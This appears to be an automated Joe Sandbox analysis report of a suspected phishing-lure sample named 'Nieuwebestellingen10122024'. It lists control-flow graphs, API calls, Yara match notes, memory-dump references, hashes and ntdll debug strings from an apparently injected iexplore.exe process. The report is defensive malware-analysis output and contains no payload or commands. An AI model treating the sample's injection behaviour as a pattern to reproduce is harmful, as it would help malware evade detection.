                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=1272 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8
                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false


                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:15.7%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                              Total number of Nodes:3
                                                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                                                              execution_graph 16638 7ff847150cc9 16639 7ff847150cd1 FreeConsole 16638->16639 16641 7ff847150d8e 16639->16641

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 0 G$0 G$0 G$0 G$0 G$0 G$0 G$:!G$:!G$:!G$P G$P G$P G$P G$P G
                                                                                                                                                                              • API String ID: 0-2570978510
                                                                                                                                                                              • Opcode ID: 8e6bfba3f1f59f8a0d04423f928acd7a32187628d4613e9d754535197b7b26c8
                                                                                                                                                                              • Instruction ID: 1c5971c8f87905ba2fddf5e28501550b1a343a0076bf4c64131777b2e5ed7eba
                                                                                                                                                                              • Opcode Fuzzy Hash: 8e6bfba3f1f59f8a0d04423f928acd7a32187628d4613e9d754535197b7b26c8
                                                                                                                                                                              • Instruction Fuzzy Hash: D282E031B1CE4A8FEB98EA28905577973D2FF98780F1545BDD04EC7686DE24EC428B90

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 0 G$0 G$0 G$P G$P G$P G$P G$P G
                                                                                                                                                                              • API String ID: 0-1893089020
                                                                                                                                                                              • Opcode ID: eb85f3ab1c29dd75cc7b978b8d633175731811b8ba543ad6cb9a00ae15059c66
                                                                                                                                                                              • Instruction ID: 3e051becd12f79d6a5a615e4080d01e185df27d18cf88a7fb6082c1d1e91e009
                                                                                                                                                                              • Opcode Fuzzy Hash: eb85f3ab1c29dd75cc7b978b8d633175731811b8ba543ad6cb9a00ae15059c66
                                                                                                                                                                              • Instruction Fuzzy Hash: A6320231A1CA469FE758FB2C94566B973D2FF98790F44057ED04EC72C3DE28A8468B81

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ($HB$G$HB$G$XQ"G
                                                                                                                                                                              • API String ID: 0-3090959669
                                                                                                                                                                              • Opcode ID: e5ddee613888686683991ef87bb31de8f8b98237f5c9b3c88701bb2d0fdb889f
                                                                                                                                                                              • Instruction ID: ae415fea13dc12698f33f43d8ac5da3a1ed858a864098e903073a6d95560ae0b
                                                                                                                                                                              • Opcode Fuzzy Hash: e5ddee613888686683991ef87bb31de8f8b98237f5c9b3c88701bb2d0fdb889f
                                                                                                                                                                              • Instruction Fuzzy Hash: 3B429370A1CA4A8FEB99EB18D095AB977E1FFA8340F15457ED44EC3296CE34E841CB41
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2167284543.00007FF847260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847260000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847260000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: A
                                                                                                                                                                              • API String ID: 0-3554254475
                                                                                                                                                                              • Opcode ID: 919a7bbc39019bca7fcee34536eff639bc4641fdf8b57f709f9249660562bca4
                                                                                                                                                                              • Instruction ID: 18b64c8936a3eb5f9095b66948623790b4a212b1473869539cfb5d03c1ba3768
                                                                                                                                                                              • Opcode Fuzzy Hash: 919a7bbc39019bca7fcee34536eff639bc4641fdf8b57f709f9249660562bca4
                                                                                                                                                                              • Instruction Fuzzy Hash: 7A03483180DBD98FE766EB2898556A87BE0FF56351F1805FFC08ACB193DA286C46C741
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: fM_H
                                                                                                                                                                              • API String ID: 0-40886633
                                                                                                                                                                              • Opcode ID: 733a00fded5732f7ad6090d19e5f331edc48d0647fbccc49981b2f6f7df70fdc
                                                                                                                                                                              • Instruction ID: 74a8d8f3697ef6a0ab208b67f9b8c45b0196b45e30d076040f06e796ec29d947
                                                                                                                                                                              • Opcode Fuzzy Hash: 733a00fded5732f7ad6090d19e5f331edc48d0647fbccc49981b2f6f7df70fdc
                                                                                                                                                                              • Instruction Fuzzy Hash: F8E2F831A1CD0ACFEB99FA2C945967873E1FF98751B5402B9C44EC7296DE24EC428B81

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Pp"G
                                                                                                                                                                              • API String ID: 0-4054985469
                                                                                                                                                                              • Opcode ID: 99821fd2796e1697d2b88a6dfc75064433803b6658cc00244285a161647cf272
                                                                                                                                                                              • Instruction ID: a69e56ae3a85d5afacd96deedb2b2bd2b8b274310f6ac6b4c90b1f0e4fa03247
                                                                                                                                                                              • Opcode Fuzzy Hash: 99821fd2796e1697d2b88a6dfc75064433803b6658cc00244285a161647cf272
                                                                                                                                                                              • Instruction Fuzzy Hash: A0423A30A18A4A8FEBA8EF18C495BB973E1FF58340F1041B9D44ED7695DF35A886CB41
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 2452 7ff847150cc9-7ff847150ccf 2453 7ff847150cda-7ff847150ceb 2452->2453 2454 7ff847150cd1-7ff847150cd9 2452->2454 2455 7ff847150ced-7ff847150cf5 2453->2455 2456 7ff847150cf6-7ff847150d8c FreeConsole 2453->2456 2454->2453 2455->2456 2460 7ff847150d8e 2456->2460 2461 7ff847150d94-7ff847150dbb 2456->2461 2460->2461
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ConsoleFree
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 771614528-0
                                                                                                                                                                              • Opcode ID: da8873c060e873873dd48afe80135daa4a299d3a97b79364ff028f954abf6b65
                                                                                                                                                                              • Instruction ID: b4605cc3beb89cd266a7f466896fdaf3436f377f917f5e14f40d195d38a69af1
                                                                                                                                                                              • Opcode Fuzzy Hash: da8873c060e873873dd48afe80135daa4a299d3a97b79364ff028f954abf6b65
                                                                                                                                                                              • Instruction Fuzzy Hash: A331A63190D7888FD729DFA8D846BEABBE0EF56321F0442AED089C3193DB64A445CB51
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: XQ"G
                                                                                                                                                                              • API String ID: 0-227094213
                                                                                                                                                                              • Opcode ID: 3cbfb10b0b34dba12281e525f0e2cd27636920179d627b010b07cbe6b6dabdcf
                                                                                                                                                                              • Instruction ID: 878c860d9be0bf91a258e60f71a97cd9efdb2d1fdff20b982cbb3af6aef94a81
                                                                                                                                                                              • Opcode Fuzzy Hash: 3cbfb10b0b34dba12281e525f0e2cd27636920179d627b010b07cbe6b6dabdcf
                                                                                                                                                                              • Instruction Fuzzy Hash: 5D522631A0CA4A8FE758EB2CE44567AB7E1FF85350F1441BAD44EC7296DA25AC43CB81
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: wL_
                                                                                                                                                                              • API String ID: 0-3720076477
                                                                                                                                                                              • Opcode ID: 6538f81262378bc5a2093c1062228b75be4fd5908c833869eeda9860ddd85206
                                                                                                                                                                              • Instruction ID: 35360723cbb3726ebc68845af2c9b4dff842d9e372ab5ad1495a1fc61fc3bb95
                                                                                                                                                                              • Opcode Fuzzy Hash: 6538f81262378bc5a2093c1062228b75be4fd5908c833869eeda9860ddd85206
                                                                                                                                                                              • Instruction Fuzzy Hash: 4EF15423A0C1669AE7107EBDB44A0FD7B50DF817F6B094177D28D8A0C7DE18A48E8BD5

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:1.4%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:9%
                                                                                                                                                                              Total number of Nodes:122
                                                                                                                                                                              Total number of Limit Nodes:7

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 187 417ba3-417bcc call 42f863 190 417bd2-417be0 call 42fe63 187->190 191 417bce-417bd1 187->191 194 417bf0-417c01 call 42e303 190->194 195 417be2-417bed call 430103 190->195 200 417c03-417c17 LdrLoadDll 194->200 201 417c1a-417c1d 194->201 195->194 200->201
                                                                                                                                                                              APIs
                                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C15
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Load
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                                              • Opcode ID: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                                                                                              • Instruction ID: 29541c4c1cb86a97046c076e925ce7a07987024d856869177c45976850981732
                                                                                                                                                                              • Opcode Fuzzy Hash: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                                                                                              • Instruction Fuzzy Hash: 9A0125B5E0410DABDF10DBE5DC42FDEB3789B54308F0041A6E91897241F635EB588795

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 212 42cb93-42cbcf call 404923 call 42ddf3 NtClose
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CBCA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 367 32c2b60-32c2b6c LdrInitializeThunk
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 369 32c2df0-32c2dfc LdrInitializeThunk
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 368 32c2c70-32c2c7c LdrInitializeThunk
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 0 4143ac-4143ae 1 4143b0-4143bc 0->1 2 414429-41443d 0->2 3 414373-414390 1->3 4 4143be-4143ca 1->4 5 41445d-414463 2->5 6 41443f-41444e PostThreadMessageW 2->6 3->0 6->5 7 414450-41445a 6->7 7->5
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041444A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 2361o4QI$2361o4QI
                                                                                                                                                                              • API String ID: 1836367815-3806180685

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041444A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 2361o4QI$2361o4QI
                                                                                                                                                                              • API String ID: 1836367815-3806180685

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041444A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 2361o4QI$2361o4QI
                                                                                                                                                                              • API String ID: 1836367815-3806180685

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 202 42ceb3-42cef4 call 404923 call 42ddf3 RtlAllocateHeap
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,0041E99E,?,?,00000000,?,0041E99E,?,?,?), ref: 0042CEEF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 207 42cf03-42cf44 call 404923 call 42ddf3 RtlFreeHeap
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4D8B4674,00000007,00000000,00000004,00000000,0041742C,000000F4), ref: 0042CF3F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3298025750-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 217 42cf53-42cf8f call 404923 call 42ddf3 ExitProcess
                                                                                                                                                                              APIs
                                                                                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,40B9B70A,?,?,40B9B70A), ref: 0042CF8A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-2160512332
                                                                                                                                                                              Strings
                                                                                                                                                                              • Address of the debug info found in the active list., xrefs: 032F54AE, 032F54FA
                                                                                                                                                                              • Thread identifier, xrefs: 032F553A
                                                                                                                                                                              • Critical section debug info address, xrefs: 032F541F, 032F552E
                                                                                                                                                                              • undeleted critical section in freed memory, xrefs: 032F542B
                                                                                                                                                                              • Invalid debug info address of this critical section, xrefs: 032F54B6
                                                                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 032F54CE
                                                                                                                                                                              • Critical section address., xrefs: 032F5502
                                                                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 032F540A, 032F5496, 032F5519
                                                                                                                                                                              • Critical section address, xrefs: 032F5425, 032F54BC, 032F5534
                                                                                                                                                                              • double initialized or corrupted critical section, xrefs: 032F5508
                                                                                                                                                                              • 8, xrefs: 032F52E3
                                                                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 032F54E2
                                                                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 032F5543
                                                                                                                                                                              • corrupted critical section, xrefs: 032F54C2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                              • API String ID: 0-2368682639
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                                              • API String ID: 0-3591852110
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                              • API String ID: 0-3532704233
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                                                              • API String ID: 0-3063724069
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                              • API String ID: 0-1700792311
                                                                                                                                                                              Strings
                                                                                                                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 0327D196
                                                                                                                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0327D0CF
                                                                                                                                                                              • @, xrefs: 0327D313
                                                                                                                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0327D262
                                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0327D2C3
                                                                                                                                                                              • @, xrefs: 0327D2AF
                                                                                                                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0327D146
                                                                                                                                                                              • @, xrefs: 0327D0FD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
